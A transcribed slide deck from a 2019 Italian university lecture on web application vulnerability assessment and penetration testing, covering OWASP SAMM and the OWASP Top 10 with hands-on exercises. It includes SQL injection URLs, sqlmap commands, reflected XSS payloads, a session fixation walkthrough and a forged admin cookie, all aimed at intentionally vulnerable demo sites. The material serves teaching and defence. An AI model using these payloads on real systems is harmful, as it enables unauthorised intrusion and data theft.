Web App Security Vulnerability Assessment e Penetration Test di web app - Alfonso Solimeo Bologna, 28/11/2019 Bologna, 28/11/2019 Copyright ...
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
Web App Security Vulnerability Assessment e Penetration Test di web app Alfonso Solimeo Bologna, 28/11/2019 Bologna, 28/11/2019 Copyright CryptoNet Labs srl 1
AGENDA Ø SAMM – Software Assurance Maturity Model Ø Vulnerability Assessment & Penetration Test Ø OWASP Top 10 2017 Bologna, 28/11/2019 Copyright CryptoNet Labs srl 2
OWASP Open Web Application Security Project • Since 2001 • Not-for-profit charitable organization • Dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted https://www.owasp.org/index.php/Marketing/Resources Bologna, 28/11/2019 Copyright CryptoNet Labs srl 3
SAMM: Software Assurance Maturity Model The Software Assurance Maturity Model (SAMM) is an OWASP project It’s an open framework to help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization. SAMM was defined with flexibility in mind such that it can be utilized by small, medium, and large organizations using any style of development. Additionally, this model can be applied organization-wide, for a single line-of- business, or even for an individual project. https://owaspsamm.org/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 4
SAMM – Business Functions Start with the core activities tied to any organization performing software development Named generically, but should resonate with any developer or manager Bologna, 28/11/2019 Copyright CryptoNet Labs srl 5
SAMM – Business Functions Governance is centered on the processes and activities related to how an organization manages overall software development activities. More specifically, this includes concerns that impact cross-functional groups involved in development, as well as business processes that are established at the organization level. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 6
Establish the framework for a software security assurance program. It must be both measurable and aligned with the organization’s real business risk. Understand and meet external legal and regulatory requirements. Drive internal security standards to ensure compliance. Focus on project-level audits. Arm personnel involved in the software life-cycle with knowledge and resources to design, develop, and deploy secure software. Project teams will be better able to proactively identify and mitigate the specific security risks that apply to their organization. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 7
SAMM – Business Functions Construction concerns the processes and activities related to how an organization defines goals and creates software within development projects. In general, this will include product management, requirements gathering, high-level architecture specification, detailed design, and implementation. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 8
Identify and characterize potential attacks upon an organization’s software in order to better understand the risks and facilitate risk management. Promote the inclusion of security-related requirements during the software development process in order to specify correct functionality from inception. Bolster the design process with activities to promote secure-by-default designs and control over technologies and frameworks upon which software is built. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 9
SAMM – Business Functions Verification is focused on the processes and activities related to how an organization checks, and tests artifacts produced throughout software development. This typically includes quality assurance work such as testing, but it can also include other review and evaluation activities. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 10
Assessment of software design and architecture for security-related problems. Detect architecture-level issues early in software development and avoid potentially large costs from refactoring later. Inspection of software at the source code level in order to find security vulnerabilities. Start with lightweight checklists and inspects the most critical software modules. Add automation technology to improve coverage and efficacy. Inspection of software in the runtime environment making visible operational misconfigurations or errors in business logic that are difficult to otherwise find. Penetration testing and test automation. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 11
SAMM – Business Functions Operations entails the processes and activities related to how an organization manages software releases that has been created. This can involve shipping products to end users, deploying products to internal or external hosts, and normal operations of software in the runtime environment. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 12
Processes to handle vulnerability reports and operational incidents. Assignment of roles in the event of an incident to improve visibility and tracking on issues that occur. Dissection of incidents and vulnerability reports to collect metrics and root-cause information. Build assurance for the runtime environment. Tracking and distributing of information about the operating environment to keep development teams better informed. Deployment of protection tools to add layers of defenses and safety nets. Gather security critical information from the project teams building software and communicate it to the users and operators of the software. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 13
SAMM – Security Practices • From each of the Business Functions, 3 Security Practices are defined • The Security Practices cover all areas relevant to software security assurance Security Testing is a process intended to reveal flaws in the security mechanisms of an information system Bologna, 28/11/2019 Copyright CryptoNet Labs srl 14
VA vs PT https://www.immuniweb.com/blog/how_to_keep_your_website_safe_in_2015.html Bologna, 28/11/2019 Copyright CryptoNet Labs srl 15
VA vs PT • Vulnerability Assessment (VA) • Vulnerability assessments discover which vulnerabilities are possibly present, but don’t try to exploit them • Typically automated • Penetration Test (PT) • Penetration tests simulate (evil) hacker attempts to get into a system to find exploitable flaws and measure the severity of each • Conducted by human beings https://www.alienvault.com/blogs/security-essentials/penetration- testing-vs-vulnerability-scanning-whats-the-difference Bologna, 28/11/2019 Copyright CryptoNet Labs srl 18
VAPT Network Mapping Vulnerability Scanning Port Scanning Scanning Service OS Fingerprinting Fingerprinting Bologna, 28/11/2019 Copyright CryptoNet Labs srl 19
Discovery Internet Bologna, 28/11/2019 Copyright CryptoNet Labs srl 20
Discovery nmap -sS -sU -O -sV mysite.com ... PORT STATE SERVICE VERSION 123/udp open ntp udp-response ttl 57 NTP v4 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.19 ... Bologna, 28/11/2019 Copyright CryptoNet Labs srl 21
Vulnerability Scanning In generale Controlli differenti a seconda del tipo di servizio Controlli comuni • Versioni dei software • Cifratura delle comunicazioni • Robustezza dei meccanismi di autenticazione Web application VAPT Analisi dei servizi web Bologna, 28/11/2019 Copyright CryptoNet Labs srl 22
Versioni di software vulnerabili CVE (Common Vulnerabilities and Exposures) • CVE is a list of common identifiers for publicly known cyber security vulnerabilities Bologna, 28/11/2019 Copyright CryptoNet Labs srl 23
Versioni di software vulnerabili https://www.cvedetails.com/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 24
Versioni di software vulnerabili https://www.exploit-db.com/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 25
OK…now, «HACK THE PLANET!» What are the most dangerous vulnerabilities? How can i find and exploit them? How much it is difficult? Bologna, 28/11/2019 Copyright CryptoNet Labs srl 27
Trend OWASP Top 10 - 2017 ➡ A1:2017 - Injection ➡ A2:2017 – Broken Authentication ↘ A3:2017 – Sensitive Data Exposure A4:2017 – XML External Entities (XXE) ↘ A5:2017 – Broken Access Control ↗ A6:2017 – Security Misconfiguration ↘ A7:2017 – Cross-Site Scripting (XSS) A8:2017 – Insecure Deserialization ➡ A9:2017 – Using Components with Known Vulnerabilities A10:2017 – Insufficient Logging&Monitoring Bologna, 28/11/2019 Copyright CryptoNet Labs srl 28
A1 – Injection Untrusted data is sent to an interpreter as part of a command or query. The data can trick the interpreter into executing unintended commands or accessing data without proper authorization. https://xkcd.com/327/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 29
A1 – Injection (SQL Injection) String query = "SELECT * FROM accounts WHERE acct='" + httpParam + "'"; HTTPSQL DB Table ↓ HTTP response query Ï request "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Ð > M > M 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query 4. Database runs query containing Account Summary attack and sends results back to Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 application Acct:5424-9383-2039-4029 5. Application processes data as Acct:4128-0004-1234-0293 normal and sends results to the user Bologna, 28/11/2019 Copyright CryptoNet Labs srl 30
A1 – Injection (SQL Injection) Blind SQL Injection L’applicazione vulnerabile non scrive direttamente i risultati su di una pagina web, ma mostra una pagina di errore generica. Per estrarre dei dati bisogna fare un grande numero di richieste al server cercando di ottenere delle risposte vero/falso, discriminando i risultati in base a: • Tempi di risposta, usando le funzioni SLEEP (e simili) → Time Based • Differenze nelle pagine di errore → Boolean Based https://www.acunetix.com/websitesecurity/sql-injection2/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 31
A1 – Injection Impact • Entire database can usually be read or modified • May also allow full database schema, or account access, or even OS level access Recommendations • Encode all user input before passing it to the interpreter • Use an interface that supports bind variables (e.g., prepared statements, or stored procedures) • Always minimize database privileges to reduce the impact of a flaw Bologna, 28/11/2019 Copyright CryptoNet Labs srl 32
Hands On! – SQL Injection (1) URL di partenza http://php.testsparker.com/artist.php?id=test Test 1 http://php.testsparker.com/artist.php?id=1 Test 2 http://php.testsparker.com/artist.php?id=1%20OR%201=1 Test 3 http://php.testsparker.com/artist.php?id=1 OR 1=(SELECT SLEEP(10)) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 33
Hands On! – SQL Injection (2) Test 4 http://php.testsparker.com/artist.php?id=1 OR 1=(SELECT COUNT(*) FROM information_schema.SCHEMATA) Test 5 http://php.testsparker.com/artist.php?id=1 OR 2=(SELECT COUNT(*) FROM information_schema.SCHEMATA) …..... Test 9 http://php.testsparker.com/artist.php?id=1 OR 6=(SELECT COUNT(*) FROM information_schema.SCHEMATA) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 34
Hands On! – SQL Injection (3) Test 10 Inserimento in SqlMap dell’URL http://php.testsparker.com/artist.php?id=test ed exploitation automatica della vulnerabilità: • sqlmap -u "http://php.testsparker.com/artist.php?id=test" -- level=3 -v 3 • sqlmap -u "http://php.testsparker.com/artist.php?id=test" -- level=3 -v 3 --tables Bologna, 28/11/2019 Copyright CryptoNet Labs srl 35
A2 – Broken Authentication Application functions related to authentication and session management are not implemented correctly. Attackers can compromise passwords, keys, or session tokens to assume other users’ identities. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 37
A2 – Broken Authentication Session Fixation http://www.maravis.com/library/session-fixation-attack/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 38
A2 – Broken Authentication Email di conferma vulnerabile 1. L’attaccante si registra al sito 2. Il server assegna all’attaccante l’id 2000 e gli invia una mail di conferma con il link: http://www.site.com/userconfirmation/2000 3. L’attaccante visita il link ricevuto 4. Il server risponde con un cookie di sessione associato all’utente 2000 5. L’attaccante prova a visitare l’URL: http://www.site.com/userconfirmation/1999 6. Il server risponde con un cookie di sessione associato all’utente 1999 Bologna, 28/11/2019 Copyright CryptoNet Labs srl 39
A2 – Broken Authentication Impact • User accounts or user sessions compromised Recommendations • Use the standard session id provided by your container (JESSIONID…) • Use HTTPS and set HttpOnly and Secure flags on cookies • Verify that logoff actually destroys the session • Beware the side-doors: change my password, forgot my password, secret question, logout, email address verification… Bologna, 28/11/2019 Copyright CryptoNet Labs srl 40
A2 – Broken Authentication Cookie Flags • HttpOnly • The cookie cannot be accessed through client side script • Bypass via XST (Cross-site tracing) → Disable HTTP TRACE • Secure: • The cookie will only be sent over an HTTPS connection Set-Cookie: =[; =] [; expires=][; domain=] [; path=][; secure][; HttpOnly] Bologna, 28/11/2019 Copyright CryptoNet Labs srl 41
Hands On! – Session Fixation (1) URL con form di login http://php.testsparker.com/auth/login.php Test 1 Visitare l’URL e analizzare con Burp la generazione del cookie di sessione Test 2 Inserire le credenziali e visualizzare in Burp la mancata generazione di un nuovo cookie di sessione Bologna, 28/11/2019 Copyright CryptoNet Labs srl 42
Hands On! – Session Fixation (2) Test 3: Scenario in cui attaccante e vittima condividono lo stesso pc Attaccante: • Apertura dell’URL http://php.testsparker.com/auth/login.php • Copia in un file di testo del cookie generato dal server, salvataggio del file su una chiavetta USB ed allontanamento dal pc Vittima (dallo stesso pc appena usato dall’attaccante): • Apertura dell’URL http://php.testsparker.com/auth/login.php • Login Attaccante (da un altro pc): • Apertura dell’URL http://php.testsparker.com/auth/internal.php, ottenendo un redirect alla pagina di login • Impostazione nel proprio browser del cookie salvato in precedenza • Apertura dell’URL http://php.testsparker.com/auth/internal.php, ottenendo la stessa pagina mostrata alla vittima autenticata Bologna, 28/11/2019 Copyright CryptoNet Labs srl 43
A3 – Sensitive Data Exposure The application does not properly protect sensitive data (credit cards, authentication credentials… ). • Failure to identify all the places that data is stored or sent (web pages, third party websites…) • Failure to protect data at rest (databases, log files, backups…) • Failure to protect data in transit (browser web server, web server database server…) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 45
A3 – Sensitive Data Exposure Man in the Middle Bologna, 28/11/2019 Copyright CryptoNet Labs srl 46
A3 – Sensitive Data Exposure Insecure Storage Victim enters credit 1 card number in form 4 Malicious insider steals 4 million Log files credit card numbers Error handler logs CC 2 details because Logs are accessible to all merchant gateway is members of IT staff for 3 unavailable debugging purposes Bologna, 28/11/2019 Copyright CryptoNet Labs srl 47
A3 – Sensitive Data Exposure Impact • Attackers access or modify confidential or private information • Attackers extract secrets to use in additional attacks Recommendations • Identify all sensitive data • Identify all the places that data is stored • Identify all the places that data is sent • Use encryption • Correctly implement encryption! Bologna, 28/11/2019 Copyright CryptoNet Labs srl 48
A3 – Sensitive Data Exposure Real Case ! major italian bank • Hundreds of weak Inotes password hash exposed • hashcat + (huge) dictionary + limited computing power = 30% of pass retrieved Bologna, 28/11/2019 Copyright CryptoNet Labs srl 49
Hands On! – Man in the middle Test 1 Verifica tramite Burp dell’invio in chiaro via POST delle credenziali a partire dal form di login all’URL http://php.testsparker.com/auth/login.php Test 2 Verifica tramite Burp dell’invio in chiaro via GET delle credenziali a partire dal form di login all’URL http://google- gruyere.appspot.com/XXXXXXXXXXXXXXX/login (raggiungibile da https://google-gruyere.appspot.com/start) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 50
A4 – XML External Entities (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks. 51 Bologna, 28/11/2019 Copyright CryptoNet Labs srl
A4 – XML External Entities (XXE) XML (eXtensible Markup Language)… • is a markup language: defines a set of rules for encoding documents. (like HTML); • does not use predefined tags (unlike HTML); • used also for storing and transporting data (did you say AJAX?) DTD (Document Type Definition)… • defines the the structure and what XML doc can contains; • is declared within the optional DOCTYPE element at the start of the XML document (self-contained, external, hybrid) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 52
A4 – XML External Entities (XXE) XML entity… • is a symbolic representation of data; • entity instead of the data: < à à > • custom (defined whitin DTD) or external (declared whitin DTD, defined outside) # custom entity # external entity ]> Bologna, 28/11/2019 Copyright CryptoNet Labs srl 53
A4 – XML External Entities (XXE) 1 2 XML XML parser 4 3 Content 1 2 XXE XML parser 4 3 /etc/passwd Bologna, 28/11/2019 Copyright CryptoNet Labs srl 54
A4 – XML External Entities (XXE) Impact • Attackers extract data and execute a remote request from the server • Attackers extract secrets to use in additional attacks Recommendations • Use, if possible, less complex data formats (JSON) • Upgrade XML processors and SOAP environment. • Disable XML external entity. • Validate the input. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 55
Hands On! – XXE Test 1 All’URL https://portswigger.net/web-security/xxe/lab-exploiting- xxe-to-retrieve-files si può accedere, previa registrazione (il sito è utilissimo!), ad una demo. Utilizzare il “Check Stock” all’interno della demo e sfruttare la vulnerabilità XXE. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 56
A5 – Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 57
A5 – Broken Access Control https://www.onlinebank.com/user?id=6065 1. L’attaccante è un utente del sito 2. Prova a modificare il valore del parametro ID 3. Ottiene l’accesso alle pagine degli altri utenti Bologna, 28/11/2019 Copyright CryptoNet Labs srl 58
A5 – Broken Access Control Impact • Users are able to access unauthorized files or data Recommendations • Eliminate the direct object reference • Replace them with a temporary mapping value (e.g. 1, 2, 3) • Restrict access to authenticated users (if not public) • Enforce any user or role based permissions (if private) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 59
A6 – Security misconfiguration The application is missing the proper security hardening across one or more parts of the application stack: • OS • Web/App Server • DBMS • Code libraries • Unnecessary features enabled or installed (e.g.: services, pages) • Default accounts enabled with passwords unchanged • Error pages showing overly informative error messages to users Bologna, 28/11/2019 Copyright CryptoNet Labs srl 60
A6 – Security misconfiguration Test Account 1. L’attaccante fa enumeration degli utenti di WordPress 2. L’attaccante prova l’account di test con: - Username: test - Password: test Bologna, 28/11/2019 Copyright CryptoNet Labs srl 61
A6 – Security misconfiguration Impact • Install backdoor through missing OS or server patches • Unauthorized access to default accounts, application functionality or data Recommendations • Verify your system’s configuration management • Be aware of the configurations of your components Bologna, 28/11/2019 Copyright CryptoNet Labs srl 62
A6 – Security misconfiguration SSL/TLS • No SSL, no TLSv1.0, ok TLSv1.1, TLSv1.2 • Ciphers: • No RC2, RC4, Null, Export… • Possibly no DES • 128+ bit ciphers • Forward Secrecy ciphers • Use 2048-bit Private Keys • Signature: no SHA-1, ok SHA-2 family • No Client-Initiated Renegotiation • New Vulnerability Alerts! Bologna, 28/11/2019 Copyright CryptoNet Labs srl 63
Check HTTPS configuration https://www.ssllabs.com/ssltest/analyze.html https://www.immuniweb.com/ssl/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 64
A6 – Security misconfiguration HTTP Headers • Browser-based layer of security • Not completely cross-browser • X-Frame-Options: • Allow/deny embedding within , , • IE 8+, Chrome 4.1.249.1042+, Firefox 3.6.9+, Safari 4.0+, Opera 10.50+ • X-Frame-Options: DENY • X-Frame-Options: SAMEORIGIN • X-Frame-Options: ALLOW-FROM http://trusted-origin.com Bologna, 28/11/2019 Copyright CryptoNet Labs srl 65
A6 – Security misconfiguration HTTP Headers • Cache-Control: • Permit/prevent the caching of responses containing sensitive data • IE 6+, Chrome, Firefox, Safari, Opera • Cache-Control: no-store • Pragma: no-cache (for HTTP 1.0 compatibility) • Expires: 0 (for HTTP 1.0 compatibility) • Content-Security-Policy: • Prevents the browser from loading resources (e.g. Javascript) from external origins • Helps mitigate i.e. XSS • Content-Security-Policy: • Content-Security-Policy: default-src ‘self’ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 66
A6 – Security misconfiguration HTTP Headers • Other: • HTTP Strict-Transport-Security (HSTS) • X-Content-Type-Options • X-XSS-Protection • https://appsec-labs.com/portal/improve-your-web-apps-security- with-http-headers/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 67
Check HTTP headers configuration https://securityheaders.com/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 68
Hands On! – Configurazione HTTPS Test 1 Verifica della configurazione HTTPS di studenti.unibo.it tramite https://www.ssllabs.com/ssltest/analyze.html Test 2 Verifica della configurazione HTTPS di studenti.unibo.it tramite https://www.immuniweb.com/ssl/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 69
Hands On! – Configurazione Header HTTP Test 1 Verifica della configurazione degli header HTTP di php.testsparker.com tramite https://securityheaders.com/ Test 2 Verifica della configurazione degli header HTTP di studenti.unibo.it su tramite https://securityheaders.com/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 70
A7 – Cross-Site Scripting An application takes untrusted data and writes it to a web page without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. http://memeshappen.com/meme/futura ma-fry/script-alert-xss-script-60649 Bologna, 28/11/2019 Copyright CryptoNet Labs srl 71
A7 – Cross-Site Scripting (reflected)
http://php.testsparker.com/products.php?pro=url">alert("xss")A7 – Cross-Site Scripting (reflected)
http://php.testsparker.com/products.php?pro=url">alert("xss")A7 – Cross-Site Scripting (reflected) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 74
A7 – Cross-Site Scripting (stored) 1 2 3 4 5 http://www.acunetix.com/blog/articles/blind-xss/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 75
A7 – Cross-Site Scripting Impact • Steal user’s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site Recommendations • Output encode all user supplied input • Perform ‘white list’ input validation on all user input to be included in page • Use tested and well-known third party libraries to filter input data Bologna, 28/11/2019 Copyright CryptoNet Labs srl 76
Hands On! – Cross-Site Scripting Reflected (1) URL di partenza http://php.testsparker.com/hello.php?name=Visitor Test 1 http://php.testsparker.com/hello.php?name=Visitor"
Hands On! – Cross-Site Scripting
Reflected (2)
URL di partenza
http://php.testsparker.com/products.php?pro=url
Test 1
http://php.testsparker.com/products.php?pro=url">alert("xss")A8 – Insecure Deserialization An application doesn’t properly secure the process of serialization/deserialization and takes untrusted serialized data. Insecure Deserialization can lead to a wide range of attacks: remote command execution, XSS, etc. 79 Bologna, 28/11/2019 Copyright CryptoNet Labs srl
A8 – Insecure Deserialization
https://medium.com/blog-blog/insecure-deserialization-e5398e83defe
// JavaScript serialization
var person = {
name = "John", {name="John»,surname="Doe"}
surname = "Doe"
de-serialization
}
Bologna, 28/11/2019 Copyright CryptoNet Labs srl 80A8 – Insecure Deserialization
POST(john,pass)
cookie: eyJqb2huIjoidXNlciJ9
p l o i t
k s e x
a t t a c
base64({"john":"user"}) = eyJqb2huIjoidXNlciJ9
X X E e c u r e
) I n s !
(als o
a t i o n
base64({"john":"admin"}) = eyJqb2huIjoiYWRtaW4ifQ==
r i a l i z
D e s e
get-admin-panel.php
cookie: eyJqb2huIjoiYWRtaW4ifQ==
200 OK
Bologna, 28/11/2019 Copyright CryptoNet Labs srl 81A8 – Insecure Deserialization Impact • Remote Code Execution, XXE, XSS Recommendations • Integrity checks: only trusted object are accepted. • Validate input. • Use safe functions to deserialize • Serialize only subset (and trusted) of data. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 82
A9 – Using Components with Known Vulnerabilities The application relies on components (frameworks, libraries, products… ) with known vulnerabilities. Heartbleed ShellShock GHOST DROWN KRAK CVE-2014-0160 CVE-2014-6271 CVE-2015-0235 CVE-2016-0800 Vari CVE-2017 (OpenSSL) (Bash) (Linux) (OpenSSL) (WPA2) Bologna, 28/11/2019 Copyright CryptoNet Labs srl 83
A9 – Using Components with Known Vulnerabilities https://nvd.nist.gov/vuln-metrics/visualizations/cvss-severity-distribution-over-time Bologna, 28/11/2019 Copyright CryptoNet Labs srl 84
A9 – Using Components with Known Vulnerabilities Impact • Full range of weaknesses is possible, including injection, broken access control, XSS ... https://vulnerability-watch.connettiva.eu/ • The impact could range from minimal to complete host takeover and data compromise Recommendations • Perform periodic checks to see if your libraries: • are out of date • have known vulnerabilities Bologna, 28/11/2019 Copyright CryptoNet Labs srl 85
A9 – Using Components with Known Vulnerabilities https://vulnerability-watch.connettiva.eu/ Bologna, 28/11/2019 Copyright CryptoNet Labs srl 86
Hands On! – Software Vulnerabili Test Analisi via Burp delle versioni dei software rivelate dagli header HTTP delle risposte fornite da http://php.testsparker.com e ricerca su CveDetails ed ExploitDb di informazioni sulle vulnerabilità. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 87
A10 – Insufficient Logging&Monitoring The application has insufficient logging and monitoring services. The activities of users (so also attackers), especially on crucial application’s section, are not logged and/or analyzed. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 88
A10 – Insufficient Logging&Monitoring
Bruteforce Attack
No monitoring
seconds (s)
{1…n} n>>s of login’s
attempts
Monitoring of
seconds (s)
{1…n} n>>s login’s
attempts
ban IP!
Bologna, 28/11/2019 Copyright CryptoNet Labs srl 89A10 – Insufficient Logging&Monitoring Impact • Successfully exploit of vulnerability via vulnerability probing • The impact depends on vulnerability severity Recommendations • Implements Logging&Monitoring services plus proactive actions. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 90
That’s it? Top Ten is about the most common vulnerabilities Others • Abuse of functionality • HTML Injection • CSRF (Cross-Site Request Forgery) • SSRF (Server Side Request Forgery) • Local & Remote File Inclusion • Information Leakage • Frameable Response • Business logic flaws • Denial of Service • … Bologna, 28/11/2019 Copyright CryptoNet Labs srl 91
HTML Injection A type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. Spesso derivato da una protezione parzialmente inefficace contro i Cross site scripting. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 92
Abuso di funzionalità Un attaccante riesce a utilizzare in modo malevolo una funzionalità di una applicazione web Casi tipici • Form di registrazione • Form di richiesta contatti Bologna, 28/11/2019 Copyright CryptoNet Labs srl 93
HTML Injection + Abuso di funzionalità Bologna, 28/11/2019 Copyright CryptoNet Labs srl 94
alfonso.solimeo@cryptonetlabs.it Bologna, 28/11/2019 Copyright CryptoNet Labs srl 95
Tesi e Attività @ CryptoNet Labs Analisi delle criticità degli ambienti cloud (AWS, Azure, Google Cloud), Pentesting e Auditing di ambienti Cloud tramite tecniche e metodologie di individuazione ed exploit delle vulnerabilità e di configurazioni non sicure. Modifica/patching di un binario Android (apk) per effettuare, tramite il Analisi dinamica di applicazioni, basata su framework Frida, l'hooking/intercept di funzioni e chiamate sensibili ai framework Frida, per device Android non-rooted fini della sicurezza, permettendo così un'analisi dinamica/run-time dell'applicazione. Il tutto eseguibile su device Android non-rooted. Modifica/patching di un binario iOS (ipa) realizzato tramite il linguaggio Analisi dinamica di applicazioni realizzate in Swift per effettuare l'hooking/intercept di funzioni e chiamate sensibili linguaggio Swift per device iOS non-jailbroken ai fini della sicurezza, permettendo così un'analisi dinamica/run-time dell'applicazione. Il tutto eseguibile su device iOS non-jailbroken. Analisi statica di mobile app realizzate con Reverse engineer in termini di analisi statica di mobile app Android e/o iOS scritte con framework cross-platform Xamarin, al fine di estrapolare framework Xamarin informazioni relative alla loro (in)sicurezza. OSINT: analisi della reputation di un endpoint e Analizzare la reputation di un endpoint (IP, dominio, email, etc) tramite l'utilizzo di basi di dati opensource, sfruttando in questo modo le automatizzazione del processo tecnologie OSINT ed arrivando ad automatizzare tale processo. Bologna, 28/11/2019 Copyright CryptoNet Labs srl 96
You can also read
